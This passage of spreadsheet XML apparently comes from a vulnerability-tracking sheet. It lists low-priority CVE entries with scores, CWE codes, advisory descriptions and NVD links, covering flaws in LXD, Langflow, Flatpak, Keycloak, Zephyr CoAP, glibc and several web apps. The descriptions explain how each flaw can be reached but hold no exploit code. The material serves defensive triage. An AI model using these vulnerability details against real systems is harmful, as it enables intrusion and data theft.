          <t>Path traversal in the CLI client image export and copy functionality in Canonical LXD from 4.0.2 before 4.0.14, 5.0.10, 5.21.8, and 6.10 on all platforms allows a remote malicious or machine-in-the-middle image server to overwrite arbitrary local files and execute code on the client system via a crafted Content-Disposition header filename parameter during unified image export or copy operations into a local directory target.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86334</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101861</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Langflow 1.0.16 before 1.12.0 and 0.0.94 before 1.12.0 contain an unsafe eval() vulnerability in schema.py that allows authenticated attackers to achieve code execution by placing a Python object with a malicious __repr__ method into component input options lists. The eval() sink is triggered when a component is converted into a LangChain tool via ComponentToolkit.get_tools(), including during custom component saves through the API, by interpolating options into a Literal type string that is passed directly to eval() without safe evaluation controls.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101861</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82326</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Enocta Educational Technologies Inc. Enocta Platform allows XSS Targeting HTML Attributes.
This issue affects Enocta Platform: through 2026-09-28.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82326</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97026</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>3.9</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>tempo, rust</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-378</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Flatpak creates temporary child repository directories under the user cache with world-writable permissions (0777). On multi-user systems with a permissive umask, other local users could read or modify the temporary directory used while installing apps or runtimes, potentially causing installation failures (denial of service); tampered content would fail signature/digest verification rather than being trusted.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97026</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101333</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>keycloak, requests, gin</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Micrometer user-event metrics listener of Keycloak, a solution for integrated identity and access management. The issue occurs when the listener is configured to include the idp tag. An unauthenticated attacker can send requests to the identity broker login endpoint using arbitrary provider aliases, causing the system to create an unlimited number of metric time series. This can lead to excessive memory consumption and degrade the performance of both the server and its monitoring tools.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101333</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101915</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-550</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.6 and 1.14.5, when an application method handler throws an uncaught error, the server includes its error message in the status message sent to the client. The thrown error message is transmitted to the client, causing sensitive information disclosure when the message contains sensitive data. This issue is fixed in versions 1.13.6 and 1.14.5.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101915</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102363</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains a missing authentication vulnerability in the DeliveryController checkDelivery endpoint that allows unauthenticated attackers to read shipment tracking information by supplying an order number parameter. Attackers can access carrier names, waybill numbers, and complete logistics trails for any order without authentication or ownership verification.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102363</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18416</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>The CoAP link-format helper match_path_uri() in subsys/net/lib/coap/coap_link_format.c compares a registered resource path against the URI carried in a Uri-Query href= option. That URI is not NUL terminated, but the inner character loop advanced its index k once per path character without ever testing it against the option length len. When a registered path segment is longer than the supplied URI and the URI is a prefix of it, the loop reads uri[len] and beyond, past the end of the option value.
The path is reached from coap_well_known_core_get_len() and coap_well_known_core_get() via match_queries_resource(), i.e. by any unauthenticated GET /.well-known/core?href=/&lt;prefix&gt; request to a device that serves /.well-known/core (for the CoAP server subsystem, CONFIG_COAP_SERVER_WELL_KNOWN_CORE, default y) and has at least one resource that declares struct coap_core_metadata attributes.
The over-read does not reach the receive buffer. The well-known-core builders parse the query into a stack-local struct coap_option, whose value is a fixed array (value[12], or CONFIG_COAP_EXTENDED_OPTIONS_LEN_VALUE bytes) that the option bytes are copied into, so uri points into that copy. Reading past len therefore reads the unused, uninitialized tail of the array and, when the option fills it, the bytes just past it in the same stack frame. (In the ZoAP library of v1.8.0 to v1.9.x the option value was instead a pointer into the received packet, and the over-read ran past the option inside the packet buffer.)
The impact is bounded. The number of bytes read past the end is limited by the length of the resource path segment, and each additional byte is only read if it happens to equal the next path character, so in practice the over-read is one byte. It also cannot influence the response: returning a match requires the final compared index to be len - 1 or len, both in bounds, so out-of-bounds bytes only ever steer the loop to the next candidate resource. The consequence is undefined behaviour, not information disclosure and not a matching error.
The fix adds a k &gt;= len guard at the top of the inner loop, so every uri[k] dereference is within the option value while still allowing a trailing * wildcard to match a longer path.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18416</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97399</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>3ff69d7a-14f2-4f67-a097-88dee7810d18</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>The strncasecmp function in the GNU C Library 2.24 and later optimized for the Power8 architecture may read one byte beyond the input size limit, which may crash a program when that byte is not readable.
This condition may happen when the input strings to the strncasecmp function are attacker controlled in an application and they match all the way up to the edge of their page and the neighbouring page is either not mapped or is not readable.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97399</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97027</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>3.6</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Flatpak passes through arbitrary vendor-extension keys unmodified when exporting an application's Desktop Entry (.desktop) and D-Bus Service (.service) files, instead of validating against an allowlist. A malicious Flatpak app can use this to cause denial of service (e.g. forced application restart loops) or to influence host D-Bus/systemd activation behavior beyond what the sandbox is intended to permit.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97027</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101141</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Eleveo Call Recording Software 9.7.0. Affected is an unknown function of the file /callrec/audio.jsp of the component Play Audio Page. Executing a manipulation of the argument viewRoleId/cfType can lead to cross site scripting. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101141</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102264</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in mwasikz robo-cafe-rms up to 228c44a02823f04e85db32b7137809a2856148fc. The impacted element is an unknown function of the file frontend/update-account.php of the component Edit Profile Feature. Performing a manipulation of the argument Name/Address/City results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102264</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102290</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in CodeCanyon Rocket LMS up to 2.2. This affects an unknown function of the component Student Profile Image Upload. Executing a manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102290</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101131</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-807</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in deepseek-ai deepseek-harness up to 0.1.5-rc.3. Impacted is an unknown function of the file packages/e2b/e2b/src/index.ts of the component dsh. The manipulation of the argument E2B_API_KEY leads to reliance on untrusted inputs in a security decision. Local access is required to approach this attack. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101131</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97025</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>3.2</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-378</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>Flatpak writes the OCI repository authentication token with world-readable permissions (0644) in the system-helper's cache directory, allowing other local users on a multi-user system to read the token and impersonate the authenticated user against the OCI repository. Only OCI-based sources (e.g. as used by Fedora) are affected; libostree-based sources such as Flathub are not.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97025</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101132</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
